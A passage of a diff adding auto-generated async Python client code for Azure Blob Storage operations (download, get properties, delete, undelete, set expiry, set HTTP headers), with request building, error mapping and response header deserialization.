+ def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def download( + self, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + range: Optional[str] = None, + range_get_content_md5: Optional[bool] = None, + range_get_content_crc64: Optional[bool] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> IO: + """The Download operation reads or downloads a blob from the system, including its metadata and + properties. You can also call Download to read a snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param range_get_content_md5: When set to true and specified together with the Range, the + service returns the MD5 hash for the range, as long as the range is less than or equal to 4 MB + in size. Default value is None. + :type range_get_content_md5: bool + :param range_get_content_crc64: When set to true and specified together with the Range, the + service returns the CRC64 hash for the range, as long as the range is less than or equal to 4 + MB in size. Default value is None. + :type range_get_content_crc64: bool + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_download_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + range=range, + lease_id=_lease_id, + range_get_content_md5=range_get_content_md5, + range_get_content_crc64=range_get_content_crc64, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.download.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 206]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + deserialized = response.stream_download(self._client._pipeline) + + if response.status_code == 206: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + download.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_properties( # pylint: disable=inconsistent-return-statements + self, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Get Properties operation returns all user-defined metadata, standard HTTP properties, and + system properties for the blob. It does not return the content of the blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_properties_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-creation-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-creation-time')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-incremental-copy']=self._deserialize('bool', response.headers.get('x-ms-incremental-copy')) + response_headers['x-ms-copy-destination-snapshot']=self._deserialize('str', response.headers.get('x-ms-copy-destination-snapshot')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-access-tier']=self._deserialize('str', response.headers.get('x-ms-access-tier')) + response_headers['x-ms-access-tier-inferred']=self._deserialize('bool', response.headers.get('x-ms-access-tier-inferred')) + response_headers['x-ms-archive-status']=self._deserialize('str', response.headers.get('x-ms-archive-status')) + response_headers['x-ms-access-tier-change-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-access-tier-change-time')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-expiry-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-expiry-time')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-rehydrate-priority']=self._deserialize('str', response.headers.get('x-ms-rehydrate-priority')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_properties.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def delete( # pylint: disable=inconsistent-return-statements + self, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + delete_snapshots: Optional[Union[str, "_models.DeleteSnapshotsOptionType"]] = None, + request_id_parameter: Optional[str] = None, + blob_delete_type: Optional[str] = "Permanent", + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """If the storage account's soft delete feature is disabled then, when a blob is deleted, it is + permanently removed from the storage account. If the storage account's soft delete feature is + enabled, then, when a blob is deleted, it is marked for deletion and becomes inaccessible + immediately. However, the blob service retains the blob or snapshot for the number of days + specified by the DeleteRetentionPolicy section of [Storage service properties] + (Set-Blob-Service-Properties.md). After the specified number of days has passed, the blob's + data is permanently removed from the storage account. Note that you continue to be charged for + the soft-deleted blob's storage until it is permanently removed. Use the List Blobs API and + specify the "include=deleted" query parameter to discover which blobs and snapshots have been + soft deleted. You can then use the Undelete Blob API to restore a soft-deleted blob. All other + operations on a soft-deleted blob or snapshot causes the service to return an HTTP status code + of 404 (ResourceNotFound). + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param delete_snapshots: Required if the blob has associated snapshots. Specify one of the + following two options: include: Delete the base blob and all of its snapshots. only: Delete + only the blob's snapshots and not the blob itself. Default value is None. + :type delete_snapshots: str or ~azure.storage.blob.models.DeleteSnapshotsOptionType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_delete_type: Optional. Only possible value is 'permanent', which specifies to + permanently delete a blob if blob soft delete is enabled. Possible values are "Permanent" or + None. Default value is "Permanent". + :type blob_delete_type: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_delete_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + lease_id=_lease_id, + delete_snapshots=delete_snapshots, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_delete_type=blob_delete_type, + template_url=self.delete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def undelete( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """Undelete a blob that was previously soft deleted. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "undelete". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "undelete") # type: str + + + request = build_undelete_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.undelete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + undelete.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_expiry( # pylint: disable=inconsistent-return-statements + self, + expiry_options: Union[str, "_models.BlobExpiryOptions"], + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + expires_on: Optional[str] = None, + **kwargs: Any + ) -> None: + """Sets the time a blob will expire and be deleted. + + :param expiry_options: Required. Indicates mode of the expiry time. + :type expiry_options: str or ~azure.storage.blob.models.BlobExpiryOptions + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param expires_on: The time to set the blob to expiry. Default value is None. + :type expires_on: str + :keyword comp: comp. Default value is "expiry". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "expiry") # type: str + + + request = build_set_expiry_request( + url=self._config.url, + comp=comp, + version=self._config.version, + expiry_options=expiry_options, + timeout=timeout, + request_id_parameter=request_id_parameter, + expires_on=expires_on, + template_url=self.set_expiry.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_expiry.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_http_headers( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set HTTP Headers operation sets system properties on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type 